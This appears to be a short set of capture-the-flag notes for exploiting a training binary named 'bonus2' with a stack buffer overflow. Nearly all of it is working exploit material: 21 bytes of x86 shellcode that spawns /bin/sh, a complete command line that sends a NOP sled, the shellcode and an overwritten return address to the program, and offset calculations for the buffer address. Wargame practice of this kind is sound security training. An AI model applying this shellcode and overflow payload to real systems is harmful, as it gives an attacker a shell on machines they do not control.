Goedemiddag! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHH

shellcode (21 bytes)
https://shell-storm.org/shellcode/files/shellcode-517.html
\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80

LANG=nl ./bonus2 $(python -c 'print "\x90" * 19 + "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"') $(python -c 'print "AAAABBBBCCCCDDDDEEEEFFF" + "\xbf\xff\xf6\x37"[::-1]')

buffer address 0xbffff620
+13 (Goedemiddag! )
0xbffff620
0xbffff62d
+10
0xbffff637
